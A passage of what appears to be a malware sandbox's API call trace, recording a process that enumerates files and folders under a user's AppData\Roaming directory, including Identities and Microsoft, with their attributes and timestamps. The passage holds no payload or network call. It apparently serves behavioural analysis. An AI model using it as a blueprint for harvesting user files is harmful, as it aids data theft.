ftCreationTime.dwLowDateTime=0x13f66860, ftCreationTime.dwHighDateTime=0x1d7e4dd, ftLastAccessTime.dwLowDateTime=0x9ababb0, ftLastAccessTime.dwHighDateTime=0x1d7e61b, ftLastWriteTime.dwLowDateTime=0x9ababb0, ftLastWriteTime.dwHighDateTime=0x1d7e61b, nFileSizeHigh=0x0, nFileSizeLow=0x18e7a, dwReserved0=0x0, dwReserved1=0x0, cFileName="gaK cAtTSPHBhSVXlO.avi", cAlternateFileName="GAKCAT~1.AVI")) returned 1 [0281.443] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x556785c0, ftCreationTime.dwHighDateTime=0x1d7de40, ftLastAccessTime.dwLowDateTime=0x1eaa98a0, ftLastAccessTime.dwHighDateTime=0x1d7e639, ftLastWriteTime.dwLowDateTime=0x1eaa98a0, ftLastWriteTime.dwHighDateTime=0x1d7e639, nFileSizeHigh=0x0, nFileSizeLow=0x1206a, dwReserved0=0x0, dwReserved1=0x0, cFileName="HgZ4-2ihg.flv", cAlternateFileName="HGZ4-2~1.FLV")) returned 1 [0281.443] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfef760a0, ftCreationTime.dwHighDateTime=0x1d7d766, ftLastAccessTime.dwLowDateTime=0xe65d3ea0, ftLastAccessTime.dwHighDateTime=0x1d7e0d7, ftLastWriteTime.dwLowDateTime=0xe65d3ea0, ftLastWriteTime.dwHighDateTime=0x1d7e0d7, nFileSizeHigh=0x0, nFileSizeLow=0x1168b, dwReserved0=0x0, dwReserved1=0x0, cFileName="I8lHReUPE9snzHBWNY.wav", cAlternateFileName="I8LHRE~1.WAV")) returned 1 [0281.443] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Identities", cAlternateFileName="IDENTI~1")) returned 1 [0281.443] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f1abe30, ftCreationTime.dwHighDateTime=0x1d7df91, ftLastAccessTime.dwLowDateTime=0x55c46b00, ftLastAccessTime.dwHighDateTime=0x1d7e610, ftLastWriteTime.dwLowDateTime=0x55c46b00, ftLastWriteTime.dwHighDateTime=0x1d7e610, nFileSizeHigh=0x0, nFileSizeLow=0xf18f, dwReserved0=0x0, dwReserved1=0x0, cFileName="KvUS3F5sPJT9.png", cAlternateFileName="KVUS3F~1.PNG")) returned 1 [0281.443] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0281.443] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc454b600, ftCreationTime.dwHighDateTime=0x1d7d7d9, ftLastAccessTime.dwLowDateTime=0x8abd4c0, ftLastAccessTime.dwHighDateTime=0x1d7e4a3, ftLastWriteTime.dwLowDateTime=0x8abd4c0, ftLastWriteTime.dwHighDateTime=0x1d7e4a3, nFileSizeHigh=0x0, nFileSizeLow=0xbd1c, dwReserved0=0x0, dwReserved1=0x0, cFileName="mywNs2wOosDagMLK0w.png", cAlternateFileName="MYWNS2~1.PNG")) returned 1 [0281.443] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x326c0fd0, ftCreationTime.dwHighDateTime=0x1d7e423, ftLastAccessTime.dwLowDateTime=0x49541e90, ftLastAccessTime.dwHighDateTime=0x1d7e6f3, ftLastWriteTime.dwLowDateTime=0x49541e90, ftLastWriteTime.dwHighDateTime=0x1d7e6f3, nFileSizeHigh=0x0, nFileSizeLow=0xd024, dwReserved0=0x0, dwReserved1=0x0, cFileName="NGr7BR 0P3yRc1c.doc", cAlternateFileName="NGR7BR~1.DOC")) returned 1 [0281.443] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe7203180, ftCreationTime.dwHighDateTime=0x1d7d7b8, ftLastAccessTime.dwLowDateTime=0x8e7fe690, ftLastAccessTime.dwHighDateTime=0x1d7e683, ftLastWriteTime.dwLowDateTime=0x8e7fe690, ftLastWriteTime.dwHighDateTime=0x1d7e683, nFileSizeHigh=0x0, nFileSizeLow=0x2ff1, dwReserved0=0x0, dwReserved1=0x0, cFileName="OfE5uAfEt0ta7i.mp3", cAlternateFileName="OFE5UA~1.MP3")) returned 1 [0281.443] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd1e4c550, ftCreationTime.dwHighDateTime=0x1d7e0f1, ftLastAccessTime.dwLowDateTime=0xcf82f7f0, ftLastAccessTime.dwHighDateTime=0x1d7e6cd, ftLastWriteTime.dwLowDateTime=0xcf82f7f0, ftLastWriteTime.dwHighDateTime=0x1d7e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x147e9, dwReserved0=0x0, dwReserved1=0x0, cFileName="oWyd6MAjYLDyZ02F7J.swf", cAlternateFileName="OWYD6M~1.SWF")) returned 1 [0281.443] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9de11b20, ftCreationTime.dwHighDateTime=0x1d7e0ef, ftLastAccessTime.dwLowDateTime=0x2098d6d0, ftLastAccessTime.dwHighDateTime=0x1d7e6b7, ftLastWriteTime.dwLowDateTime=0x2098d6d0, ftLastWriteTime.dwHighDateTime=0x1d7e6b7, nFileSizeHigh=0x0, nFileSizeLow=0x15e21, dwReserved0=0x0, dwReserved1=0x0, cFileName="PdJehCXyJz0.doc", cAlternateFileName="PDJEHC~1.DOC")) returned 1 [0281.443] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xddf9a560, ftCreationTime.dwHighDateTime=0x1d7e46e, ftLastAccessTime.dwLowDateTime=0x5441e500, ftLastAccessTime.dwHighDateTime=0x1d7e4e4, ftLastWriteTime.dwLowDateTime=0x5441e500, ftLastWriteTime.dwHighDateTime=0x1d7e4e4, nFileSizeHigh=0x0, nFileSizeLow=0x1716d, dwReserved0=0x0, dwReserved1=0x0, cFileName="pntbx17fZl-QX.mkv", cAlternateFileName="PNTBX1~1.MKV")) returned 1 [0281.443] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8cd1cf40, ftCreationTime.dwHighDateTime=0x1d7d8cb, ftLastAccessTime.dwLowDateTime=0x9089730, ftLastAccessTime.dwHighDateTime=0x1d7dd02, ftLastWriteTime.dwLowDateTime=0x9089730, ftLastWriteTime.dwHighDateTime=0x1d7dd02, nFileSizeHigh=0x0, nFileSizeLow=0x170ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="qFp f_Bw-DaF.wav", cAlternateFileName="QFPF_B~1.WAV")) returned 1 [0281.444] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa52417b0, ftCreationTime.dwHighDateTime=0x1d7e1c2, ftLastAccessTime.dwLowDateTime=0xda51c4a0, ftLastAccessTime.dwHighDateTime=0x1d7e582, ftLastWriteTime.dwLowDateTime=0xda51c4a0, ftLastWriteTime.dwHighDateTime=0x1d7e582, nFileSizeHigh=0x0, nFileSizeLow=0x79c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RC-I_.xlsx", cAlternateFileName="RC-I_~1.XLS")) returned 1 [0281.444] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd79a82b0, ftCreationTime.dwHighDateTime=0x1d7d772, ftLastAccessTime.dwLowDateTime=0x830dc9c0, ftLastAccessTime.dwHighDateTime=0x1d7e193, ftLastWriteTime.dwLowDateTime=0x830dc9c0, ftLastWriteTime.dwHighDateTime=0x1d7e193, nFileSizeHigh=0x0, nFileSizeLow=0x11654, dwReserved0=0x0, dwReserved1=0x0, cFileName="TYXj7Mf9kiTNxBG4U.jpg", cAlternateFileName="TYXJ7M~1.JPG")) returned 1 [0281.444] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x53ffb1a0, ftCreationTime.dwHighDateTime=0x1d7db7d, ftLastAccessTime.dwLowDateTime=0xd08a9f90, ftLastAccessTime.dwHighDateTime=0x1d7e1cd, ftLastWriteTime.dwLowDateTime=0xd08a9f90, ftLastWriteTime.dwHighDateTime=0x1d7e1cd, nFileSizeHigh=0x0, nFileSizeLow=0x47c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="U4k m_UwUJ5.rtf", cAlternateFileName="U4KM_U~1.RTF")) returned 1 [0281.444] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x55d9bfc0, ftCreationTime.dwHighDateTime=0x1d7e186, ftLastAccessTime.dwLowDateTime=0xee7f0850, ftLastAccessTime.dwHighDateTime=0x1d7e2f0, ftLastWriteTime.dwLowDateTime=0xee7f0850, ftLastWriteTime.dwHighDateTime=0x1d7e2f0, nFileSizeHigh=0x0, nFileSizeLow=0xf222, dwReserved0=0x0, dwReserved1=0x0, cFileName="ULvvd4df.rtf", cAlternateFileName="")) returned 1 [0281.444] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x548b20b0, ftCreationTime.dwHighDateTime=0x1d7e3ec, ftLastAccessTime.dwLowDateTime=0xb0ab26f0, ftLastAccessTime.dwHighDateTime=0x1d7e550, ftLastWriteTime.dwLowDateTime=0xb0ab26f0, ftLastWriteTime.dwHighDateTime=0x1d7e550, nFileSizeHigh=0x0, nFileSizeLow=0x1746c, dwReserved0=0x0, dwReserved1=0x0, cFileName="uSg0j03ql.gif", cAlternateFileName="USG0J0~1.GIF")) returned 1 [0281.444] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x416a9db0, ftCreationTime.dwHighDateTime=0x1d7de5d, ftLastAccessTime.dwLowDateTime=0xd052f6c0, ftLastAccessTime.dwHighDateTime=0x1d7e16a, ftLastWriteTime.dwLowDateTime=0xd052f6c0, ftLastWriteTime.dwHighDateTime=0x1d7e16a, nFileSizeHigh=0x0, nFileSizeLow=0x497d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Va7N8fMY.bmp", cAlternateFileName="")) returned 1 [0281.444] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6be3c800, ftCreationTime.dwHighDateTime=0x1d7da39, ftLastAccessTime.dwLowDateTime=0xa43a0670, ftLastAccessTime.dwHighDateTime=0x1d7defc, ftLastWriteTime.dwLowDateTime=0xa43a0670, ftLastWriteTime.dwHighDateTime=0x1d7defc, nFileSizeHigh=0x0, nFileSizeLow=0xbbdc, dwReserved0=0x0, dwReserved1=0x0, cFileName="w9M6OFbhEpYW.xls", cAlternateFileName="W9M6OF~1.XLS")) returned 1 [0281.444] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3923a0e0, ftCreationTime.dwHighDateTime=0x1d7e1b7, ftLastAccessTime.dwLowDateTime=0x698c9240, ftLastAccessTime.dwHighDateTime=0x1d7e2e4, ftLastWriteTime.dwLowDateTime=0x698c9240, ftLastWriteTime.dwHighDateTime=0x1d7e2e4, nFileSizeHigh=0x0, nFileSizeLow=0xc04e, dwReserved0=0x0, dwReserved1=0x0, cFileName="X1FXDB0xedsK-UQ_h.ods", cAlternateFileName="X1FXDB~1.ODS")) returned 1 [0281.444] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf1eb1a50, ftCreationTime.dwHighDateTime=0x1d7dd83, ftLastAccessTime.dwLowDateTime=0xe1878070, ftLastAccessTime.dwHighDateTime=0x1d7e294, ftLastWriteTime.dwLowDateTime=0xe1878070, ftLastWriteTime.dwHighDateTime=0x1d7e294, nFileSizeHigh=0x0, nFileSizeLow=0x1744, dwReserved0=0x0, dwReserved1=0x0, cFileName="yeAAj6D6.m4a", cAlternateFileName="")) returned 1 [0281.444] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe8479090, ftCreationTime.dwHighDateTime=0x1d7e608, ftLastAccessTime.dwLowDateTime=0xe37f3340, ftLastAccessTime.dwHighDateTime=0x1d7e62d, ftLastWriteTime.dwLowDateTime=0xe37f3340, ftLastWriteTime.dwHighDateTime=0x1d7e62d, nFileSizeHigh=0x0, nFileSizeLow=0x110ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="zFLCzSQx9vSdvYNAAr.flv", cAlternateFileName="ZFLCZS~1.FLV")) returned 1 [0281.444] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x635af0d0, ftCreationTime.dwHighDateTime=0x1d7dc8e, ftLastAccessTime.dwLowDateTime=0x95eb90b0, ftLastAccessTime.dwHighDateTime=0x1d7dd59, ftLastWriteTime.dwLowDateTime=0x95eb90b0, ftLastWriteTime.dwHighDateTime=0x1d7dd59, nFileSizeHigh=0x0, nFileSizeLow=0xa4c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_1P9Jk_pu6Ra 0a.mp3", cAlternateFileName="_1P9JK~1.MP3")) returned 1 [0281.444] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6c0d4600, ftCreationTime.dwHighDateTime=0x1d7dccb, ftLastAccessTime.dwLowDateTime=0x8a07b8c0, ftLastAccessTime.dwHighDateTime=0x1d7dfdc, ftLastWriteTime.dwLowDateTime=0x8a07b8c0, ftLastWriteTime.dwHighDateTime=0x1d7dfdc, nFileSizeHigh=0x0, nFileSizeLow=0x1549a, dwReserved0=0x0, dwReserved1=0x0, cFileName="_Q74.jpg", cAlternateFileName="")) returned 1 [0281.444] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e81c | out: lpFindFileData=0x43e81c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6c0d4600, ftCreationTime.dwHighDateTime=0x1d7dccb, ftLastAccessTime.dwLowDateTime=0x8a07b8c0, ftLastAccessTime.dwHighDateTime=0x1d7dfdc, ftLastWriteTime.dwLowDateTime=0x8a07b8c0, ftLastWriteTime.dwHighDateTime=0x1d7dfdc, nFileSizeHigh=0x0, nFileSizeLow=0x1549a, dwReserved0=0x0, dwReserved1=0x0, cFileName="_Q74.jpg", cAlternateFileName="")) returned 0 [0281.444] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.444] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7d4) returned 1 [0281.444] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43ea34) returned 1 [0281.445] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Identities", nBufferLength=0x105, lpBuffer=0x43e570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Identities", lpFilePart=0x0) returned 0x2d [0281.445] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea54) returned 1 [0281.445] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Identities", nBufferLength=0x105, lpBuffer=0x43e534, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Identities", lpFilePart=0x0) returned 0x2d [0281.445] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Identities\\*", lpFindFileData=0x43e804 | out: lpFindFileData=0x43e804*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.447] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e80c | out: lpFindFileData=0x43e80c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.447] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e80c | out: lpFindFileData=0x43e80c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{31810C36-5D23-4CCE-A3B4-316DED195C38}", cAlternateFileName="{31810~1")) returned 1 [0281.447] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e80c | out: lpFindFileData=0x43e80c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{31810C36-5D23-4CCE-A3B4-316DED195C38}", cAlternateFileName="{31810~1")) returned 0 [0281.447] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.447] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e7c4) returned 1 [0281.447] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43ea24) returned 1 [0281.447] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9d0) returned 1 [0281.448] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Identities", nBufferLength=0x105, lpBuffer=0x43e4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Identities", lpFilePart=0x0) returned 0x2d [0281.448] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Identities\\*", lpFindFileData=0x43e780 | out: lpFindFileData=0x43e780*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.448] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e788 | out: lpFindFileData=0x43e788*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.448] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e788 | out: lpFindFileData=0x43e788*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{31810C36-5D23-4CCE-A3B4-316DED195C38}", cAlternateFileName="{31810~1")) returned 1 [0281.448] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e788 | out: lpFindFileData=0x43e788*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0281.448] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.448] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e740) returned 1 [0281.448] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e9a0) returned 1 [0281.448] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}", nBufferLength=0x105, lpBuffer=0x43e4dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpFilePart=0x0) returned 0x54 [0281.448] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9c0) returned 1 [0281.448] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}", nBufferLength=0x105, lpBuffer=0x43e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpFilePart=0x0) returned 0x54 [0281.449] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*", lpFindFileData=0x43e770 | out: lpFindFileData=0x43e770*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.449] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.449] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0281.449] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.449] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e730) returned 1 [0281.449] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e990) returned 1 [0281.449] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft", nBufferLength=0x105, lpBuffer=0x43e570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft", lpFilePart=0x0) returned 0x2c [0281.449] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43ea54) returned 1 [0281.449] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft", nBufferLength=0x105, lpBuffer=0x43e534, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft", lpFilePart=0x0) returned 0x2c [0281.450] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x43e804 | out: lpFindFileData=0x43e804*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.450] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e80c | out: lpFindFileData=0x43e80c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.450] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e80c | out: lpFindFileData=0x43e80c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3b3af0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3b3af0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3b3af0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 